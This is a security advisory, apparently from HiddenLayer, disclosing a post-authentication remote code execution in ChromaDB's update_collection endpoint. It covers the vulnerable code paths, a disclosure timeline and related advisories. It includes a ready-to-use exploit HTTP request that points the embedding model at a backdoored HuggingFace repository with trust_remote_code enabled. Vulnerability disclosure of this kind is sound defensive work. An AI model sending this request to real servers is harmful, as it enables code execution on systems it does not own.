## CVE Number

CVE-2026-45833

## Summary

Any authenticated user with UPDATE_COLLECTION permission can achieve remote code execution by updating a collection's embedding function to reference a malicious HuggingFace model with _trust_remote_code: true_. Authentication runs before model loading, so this is not a pre-authentication issue, but the model instantiation itself is unguarded.

## Products Impacted

This vulnerability affects ChromaDB versions from 0.4.17 to the latest Python release.

## CVSS Score: 9.4
[CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H](https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)

## CWE Categorization
[CWE-94](https://cwe.mitre.org/data/definitions/94.html): Improper Control of Generation of Code (‘Code Injection’)

## Details

In the V2 API the _update_collection_ function ( [chromadb/server/fastapi/__init__.py:883-919](https://github.com/chroma-core/chroma/blob/6e2c866c4/chromadb/server/fastapi/__init__.py#L883-L919)):

```python
def process_update_collection(
    request: Request, collection_id: str, raw_body: bytes
) -> None:
    update = validate_model(UpdateCollection, orjson.loads(raw_body))
    self.sync_auth_request(
        request.headers,
        AuthzAction.UPDATE_COLLECTION,
        tenant, database_name, collection_id,
    )

configuration = (
        None
        if not update.new_configuration
        else load_update_collection_configuration_from_json(
            update.new_configuration  # Dangerous code path
        )
    )
```

The _load_update_collection_configuration_from_json()_ function ( [chromadb/api/collection_configuration.py:605-633](https://github.com/chroma-core/chroma/blob/6e2c866c4/chromadb/api/collection_configuration.py#L605-L633)) calls the identical _build_from_config()_ method that the _create_collection_ path uses:

```python
if json_map.get("embedding_function") is not None:
    # ...
    ef = known_embedding_functions[json_map["embedding_function"]["name"]]
    result["embedding_function"] = ef.build_from_config(
        json_map["embedding_function"]["config"]  # Model instantiation
    )
```

This means _trust_remote_code=True_ and a malicious model_name work identically through _update_collection_. The V1 variant at [__init__.py:1920-1959](https://github.com/chroma-core/chroma/blob/6e2c866c4/chromadb/server/fastapi/__init__.py#L1920-L1959) follows the same pattern: auth check at line 1932, config loading at line 1939-1944.

Exploit request, requires _UPDATE_COLLECTION_ permission:

```plaintext
PUT /api/v2/tenants/default_tenant/databases/default_database/collections/{collection_id} HTTP/1.1
Authorization: Bearer <valid-token>
Content-Type: application/json

{
    "new_configuration": {
        "embedding_function": {
            "name": "sentence_transformer",
            "type": "known",
            "config": {
                "model_name": "attacker-org/backdoored-model",
                "device": "cpu",
                "normalize_embeddings": false,
                "kwargs": {"trust_remote_code": true}
            }
        }
    }
}
```

## Timeline

- February 17th, 2026 - Initial disclosure to ChromaDB per their security page [https://www.trychroma.com/security](https://www.trychroma.com/security).
- February 24th, 2026 - Attempted follow up through other trychroma emails.
- March 5th, 2026 - Attempted contact through IT-ISAC.
- April 16th, 2026 - Attempted final follow up through all previous channels and social media.
- May 18th, 2026 - [Publicly disclosed a first vulnerability](/content/research/chromatoast-served-pre-auth/index.html), no response from the vendor.

### Project URL:

[https://www.trychroma.com/](https://www.trychroma.com/)

[https://github.com/chroma-core/chroma/](https://github.com/chroma-core/chroma/)

RESEARCHER: Esteban Tonglet, Security Researcher, HiddenLayer

## Related SAI Security Advisory

All SAI Security Advisory

CVE-2026-79718, CVE-2026-79719, CVE-2026-79720

August 27, 2026

## Netron Vulnerability Report

Netron

Reflected XSS in Netron versions <=9.1.2 on desktop application through unsanitized node names allows an attacker to hide certain nodes, perform port scanning or abuse a Chrome n-day to achieve Remote Code Execution.

August 2026

CVE-2026-45833

June 12, 2026

## Post-Authentication RCE via update_collection

ChromaDB

Any authenticated user with UPDATE_COLLECTION permission can achieve remote code execution by updating a collection's embedding function to reference a malicious HuggingFace model with trust_remote_code: true. The update_collection endpoint uses the same build_from_config() code path as CVE-2026-45829. Authentication runs before model loading, so this is not a pre-authentication issue, but the model instantiation itself is unguarded.

June 2026
